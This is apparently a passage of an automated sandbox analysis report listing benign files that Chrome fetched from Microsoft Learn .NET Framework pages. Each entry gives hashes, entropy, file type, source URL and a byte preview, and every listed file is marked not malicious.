                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):64291
                                                                                                                                                                                  Entropy (8bit):7.964191793580486
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                  MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                  SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                  SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                  SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                                  Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1173007
                                                                                                                                                                                  Entropy (8bit):5.503893944397598
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                  MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                  SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                  SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                  SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1817143
                                                                                                                                                                                  Entropy (8bit):5.501007973622959
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                  MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                  SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                  SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                  SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1432
                                                                                                                                                                                  Entropy (8bit):4.986131881931089
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                  MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                  SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                  SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                  SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1154
                                                                                                                                                                                  Entropy (8bit):4.59126408969148
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                  MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                  SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                  SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                  SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                  Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):19696
                                                                                                                                                                                  Entropy (8bit):7.9898910353479335
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                  MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                  SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                  SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                  SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                  Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):33148
                                                                                                                                                                                  Entropy (8bit):4.917595394577667
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                  MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                  SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                  SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                  SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                  Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):35005
                                                                                                                                                                                  Entropy (8bit):7.980061050467981
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                  MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                  SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                  SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                  SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13842
                                                                                                                                                                                  Entropy (8bit):7.802399161550213
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                  MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                  SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                  SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                  SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4897
                                                                                                                                                                                  Entropy (8bit):4.8007377074457604
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                  MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                  SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                  SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                  SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):47062
                                                                                                                                                                                  Entropy (8bit):5.016115705165622
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                  MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                  SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                  SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                  SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                  Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):3130
                                                                                                                                                                                  Entropy (8bit):4.790069981348324
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                  MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                  SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                  SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                  SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                  Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18367
                                                                                                                                                                                  Entropy (8bit):7.7772261735974215
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                  MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                  SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                  SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                  SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13339
                                                                                                                                                                                  Entropy (8bit):7.683569563478597
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                  MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                  SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                  SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                  SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                  Malicious:false
